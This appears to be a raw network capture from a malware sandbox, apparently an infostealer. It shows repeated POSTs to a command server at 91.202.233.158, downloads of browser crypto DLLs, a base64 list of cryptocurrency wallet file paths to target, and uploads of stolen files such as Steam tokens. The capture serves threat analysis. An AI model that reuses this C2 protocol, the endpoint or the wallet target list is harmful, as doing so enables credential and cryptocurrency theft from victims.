Sep 1, 2024 18:28:16.661325932 CEST	564	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ Host: 91.202.233.158 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="file"------KJEHDHIEGIIIDHIDHDHJ--
Sep 1, 2024 18:28:16.899647951 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:17.471772909 CEST	564	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB Host: 91.202.233.158 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file"------IDBKFHJEBAAEBGDGDBFB--
Sep 1, 2024 18:28:17.712817907 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:18.864669085 CEST	93	OUT	GET /3836fd5700214436/freebl3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:19.096947908 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 1, 2024 18:28:19.983134985 CEST	93	OUT	GET /3836fd5700214436/mozglue.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:20.207724094 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:20 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 1, 2024 18:28:21.183260918 CEST	94	OUT	GET /3836fd5700214436/msvcp140.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:21.409347057 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 1, 2024 18:28:21.792901993 CEST	90	OUT	GET /3836fd5700214436/nss3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:22.017865896 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 1, 2024 18:28:24.053611040 CEST	94	OUT	GET /3836fd5700214436/softokn3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:24.310746908 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 1, 2024 18:28:24.582571983 CEST	98	OUT	GET /3836fd5700214436/vcruntime140.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:24.807178974 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 1, 2024 18:28:25.677237988 CEST	202	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDH Host: 91.202.233.158 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 18:28:26.143129110 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:26.660398006 CEST	468	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ Host: 91.202.233.158 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="message"wallets------KJEHDHIEGIIIDHIDHDHJ--
Sep 1, 2024 18:28:26.886646032 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 1, 2024 18:28:26.922219038 CEST	466	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI Host: 91.202.233.158 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 2d 2d 0d 0a Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="message"files------AAKKFHCFIECAAAKEGCFI--
Sep 1, 2024 18:28:27.160046101 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:27.206733942 CEST	564	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF Host: 91.202.233.158 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="file"------KEGCBFCBFBKFHIECAFCF--
Sep 1, 2024 18:28:27.439651012 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:27.549601078 CEST	204	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH Host: 91.202.233.158 Content-Length: 113011 Connection: Keep-Alive Cache-Control: no-cache
